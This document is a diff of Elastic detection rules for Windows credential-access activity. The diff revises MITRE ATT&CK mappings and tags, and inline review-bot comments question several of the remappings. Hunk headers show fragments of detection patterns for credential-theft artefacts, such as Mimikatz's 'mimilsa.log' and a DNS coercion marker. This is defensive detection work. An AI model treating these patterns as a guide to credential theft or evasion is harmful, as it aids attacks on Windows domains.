+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -104,14 +95,26 @@ any where host.os.type == "windows" and event.code == "5137" and winlog.event_da
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1557"
 name = "Adversary-in-the-Middle"
 reference = "https://attack.mitre.org/techniques/T1557/"
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1557"
+name = "Adversary-in-the-Middle"
+reference = "https://attack.mitre.org/techniques/T1557/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_dollar_account_relay.toml b/rules/windows/credential_access_dollar_account_relay.toml
index c0418104f42..502e066b3aa 100644
--- a/rules/windows/credential_access_dollar_account_relay.toml
+++ b/rules/windows/credential_access_dollar_account_relay.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/24"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/12/11"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -92,24 +92,13 @@ authentication where host.os.type == "windows" and event.code in ("4624", "4625"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1187"
-name = "Forced Authentication"
-reference = "https://attack.mitre.org/techniques/T1187/"
 [[rule.threat.technique]]
 id = "T1557"
 name = "Adversary-in-the-Middle"
 reference = "https://attack.mitre.org/techniques/T1557/"
-[[rule.threat.technique.subtechnique]]
-id = "T1557.001"
-name = "LLMNR/NBT-NS Poisoning and SMB Relay"
-reference = "https://attack.mitre.org/techniques/T1557/001/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_dollar_account_relay_kerberos.toml b/rules/windows/credential_access_dollar_account_relay_kerberos.toml
index 0a76152c2fc..60bb3d0ce29 100644
--- a/rules/windows/credential_access_dollar_account_relay_kerberos.toml
+++ b/rules/windows/credential_access_dollar_account_relay_kerberos.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/18"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/10/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -106,6 +106,7 @@ sequence by winlog.computer_name, source.ip with maxspan=5s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1187"
 name = "Forced Authentication"
@@ -115,15 +116,8 @@ reference = "https://attack.mitre.org/techniques/T1187/"
 id = "T1557"
 name = "Adversary-in-the-Middle"
 reference = "https://attack.mitre.org/techniques/T1557/"
-[[rule.threat.technique.subtechnique]]
-id = "T1557.001"
-name = "LLMNR/NBT-NS Poisoning and SMB Relay"
-reference = "https://attack.mitre.org/techniques/T1557/001/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
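Review bot: The dollar_account_relay hunk drops both `T1187` / `Forced Authentication` and the `T1557.001` / `LLMNR/NBT-NS Poisoning and SMB Relay` sub-technique, leaving only the parent `T1557`, and nothing in the hunk records why a relay-specific rule loses its relay-specific mapping. The same `T1557.001` removal appears in the dollar_account_relay_kerberos hunk on this line and in the kerberos_coerce hunk further down, so it looks like a deliberate, repo-wide decision rather than a per-rule one; if it tracks a sub-technique change in the ATT&CK version the repository pins, a sentence saying so in the commit description would save the next reviewer from re-deriving it. If it is not deliberate, the four removed sub-technique lines should be restored here, since the parent technique alone no longer distinguishes relay from other adversary-in-the-middle activity in coverage reports.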
diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml
index 25f74db6270..775ef530d84 100644
--- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml
+++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/13"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -57,24 +57,18 @@ file where host.os.type == "windows" and event.type != "deletion" and file.name
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1552.004"
 name = "Private Keys"
 reference = "https://attack.mitre.org/techniques/T1552/004/"
-
-[[rule.threat.technique]]
-id = "T1555"
-name = "Credentials from Password Stores"
-reference = "https://attack.mitre.org/techniques/T1555/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_generic_localdumps.toml b/rules/windows/credential_access_generic_localdumps.toml
index 01dd1f39038..82ee68e5f2d 100644
--- a/rules/windows/credential_access_generic_localdumps.toml
+++ b/rules/windows/credential_access_generic_localdumps.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/08/28"
 integration = ["endpoint", "windows", "m365_defender"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,17 +66,7 @@ references = [
 risk_score = 47
 rule_id = "220be143-5c67-4fdb-b6ce-dd6826d024fd"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Sysmon",
- "Data Source: Microsoft Defender for Endpoint",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -93,31 +83,31 @@ registry where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.001"
 name = "LSASS Memory"
 reference = "https://attack.mitre.org/techniques/T1003/001/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1112"
 name = "Modify Registry"
 reference = "https://attack.mitre.org/techniques/T1112/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml
index ad8287b9688..7775110a00d 100644
--- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml
+++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml
@@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kerberos_coerce.toml b/rules/windows/credential_access_kerberos_coerce.toml index 0ddf57939c2..e1d5f33af2f 100644 --- a/rules/windows/credential_access_kerberos_coerce.toml +++ b/rules/windows/credential_access_kerberos_coerce.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -103,24 +103,18 @@ host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" - [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kerberos_coerce_dns.toml b/rules/windows/credential_access_kerberos_coerce_dns.toml index 0269e12bbd3..105f030b494 100644 --- a/rules/windows/credential_access_kerberos_coerce_dns.toml +++ b/rules/windows/credential_access_kerberos_coerce_dns.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/14" +updated_date = "2026/03/23" [transform] [[transform.investigate]] 
@@ -95,24 +95,13 @@ network where host.os.type == "windows" and dns.question.name : "*UWhRC*BAAAA*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" - [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kirbi_file.toml b/rules/windows/credential_access_kirbi_file.toml index 8f5e1c47d75..216c0590ebc 100644 --- a/rules/windows/credential_access_kirbi_file.toml +++ b/rules/windows/credential_access_kirbi_file.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,19 +85,13 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_ldap_attributes.toml b/rules/windows/credential_access_ldap_attributes.toml index 9cb9ff680a5..e38375e2851 100644 --- a/rules/windows/credential_access_ldap_attributes.toml 
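Review bot: This hunk removes T1557 (Adversary-in-the-Middle) from credential_access_kerberos_coerce_dns entirely, while the sibling rule credential_access_kerberos_coerce in the preceding hunk keeps T1557 next to T1187. Both rules cover the same coercion-then-relay pattern, so the two mappings now disagree on whether the relay half is in scope. If the DNS rule is meant to cover only the coercion setup that asymmetry is fine but deserves a sentence in the PR description; otherwise the `[[rule.threat.technique]]` table with `id = "T1557"` should be retained here as well.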
+++ b/rules/windows/credential_access_ldap_attributes.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,17 +74,7 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -118,41 +108,18 @@ any where host.os.type == "windows" and event.code == "4662" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml index cb444a5b057..1dedfaed505 100644 --- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml +++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -20,15 +20,7 @@ references = ["https://blog.xpnsec.com/exploring-mimikatz-part-2/", "https://git risk_score = 47 rule_id = "3a6001a0-0939-4bbe-86f4-47d8faeb7b97" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -142,19 +134,18 @@ The Local Security Authority Subsystem Service (LSASS) is crucial for managing s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.001" -name = "LSASS Memory" -reference = "https://attack.mitre.org/techniques/T1003/001/" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_lsass_openprocess_api.toml b/rules/windows/credential_access_lsass_openprocess_api.toml index d6a78623f56..16fd4867621 100644 --- a/rules/windows/credential_access_lsass_openprocess_api.toml +++ b/rules/windows/credential_access_lsass_openprocess_api.toml 
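Review bot: The two hunks for credential_access_lsass_loaded_susp_dll replace the Credential Access mapping (T1003.001) and tag with Persistence (T1547.005) only, so the rule no longer carries any Credential Access tactic even though its file name still uses the `credential_access_` prefix. In the same PR, credential_access_mimikatz_memssp_default_logs is given both T1556/Credential Access and T1547.005/Persistence for the same SSP-loaded-into-LSASS behaviour, so this rule looks like it should keep a Credential Access entry (e.g. `id = "T1556"` / `name = "Modify Authentication Process"`) alongside the new Persistence one. If the repository's file-naming test derives the expected prefix from the threat tactics, this file would otherwise need renaming as well.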
@@ -2,7 +2,7 @@ creation_date = "2023/03/02" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -105,16 +105,7 @@ references = ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomic risk_score = 47 rule_id = "ff4599cb-409f-4910-a239-52e4e6f532ff" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -161,31 +152,18 @@ from logs-endpoint.events.api-*, logs-m365_defender.event-* metadata _id, _versi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/credential_access_machine_account_smb_relay.toml b/rules/windows/credential_access_machine_account_smb_relay.toml index 74eb4c912b9..528c8f6fb7d 100644 --- a/rules/windows/credential_access_machine_account_smb_relay.toml 
+++ b/rules/windows/credential_access_machine_account_smb_relay.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,24 +82,18 @@ file where host.os.type == "windows" and event.code == "5145" and endswith(user. [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml index cbc58475eaa..3605e41a057 100644 --- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml +++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -73,19 +73,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -96,14 +84,31 @@ file where host.os.type == "windows" and file.name : "mimilsa.log" and process.n [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml index 19d4c6879de..2e5c4f9ded2 100644 --- a/rules/windows/credential_access_mimikatz_powershell_module.toml +++ b/rules/windows/credential_access_mimikatz_powershell_module.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -135,22 +135,26 @@ powershell.file.script_block_text:( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml index d54be2d33fe..20494bd67fa 100644 --- a/rules/windows/credential_access_mod_wdigest_security_provider.toml +++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
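Review bot: The added `[[rule.threat.technique]]` table for T1649 is inserted directly after the T1003.001 subtechnique's `reference` line with no separating blank line, while this PR adds a `+` blank line before every other technique table it touches in this file and elsewhere. The same applies to the new tables in credential_access_mod_wdigest_security_provider, credential_access_persistence_network_logon_provider_modification and credential_access_posh_relay_tools. Adding the blank line before `[[rule.threat.technique]]` here keeps the threat sections uniformly formatted.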
@@ -75,17 +75,7 @@ references = [ risk_score = 73 rule_id = "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"] timestamp_override = "event.ingested" type = "eql" @@ -100,19 +90,26 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.001" -name = "LSASS Memory" -reference = "https://attack.mitre.org/techniques/T1003/001/" - +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml index 7dc0c02f2da..b16d5bc3658 100644 --- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml 
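Review bot: The threat hunk for credential_access_mod_wdigest_security_provider drops T1003.001 (LSASS Memory) and maps the rule to T1556 plus T1112 instead. The only reason to flip `UseLogonCredential` is to make plaintext credentials recoverable from LSASS memory afterwards, which is exactly what T1003.001 describes, so removing it loses the most direct mapping; T1112 for the registry write is a good addition, but T1556 (Modify Authentication Process) is a looser fit than the technique being removed. It may be worth confirming the intent and keeping `id = "T1003"` with the `T1003.001` subtechnique under the Credential Access entry.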
+++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,15 +54,7 @@ references = ["https://www.elastic.co/security-labs/detect-credential-access"] risk_score = 47 rule_id = "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" 
@@ -83,36 +75,31 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml index 3f82b5ebbed..aaa45725f4f 100644 --- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml +++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/18" integration = ["endpoint", "m365_defender", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
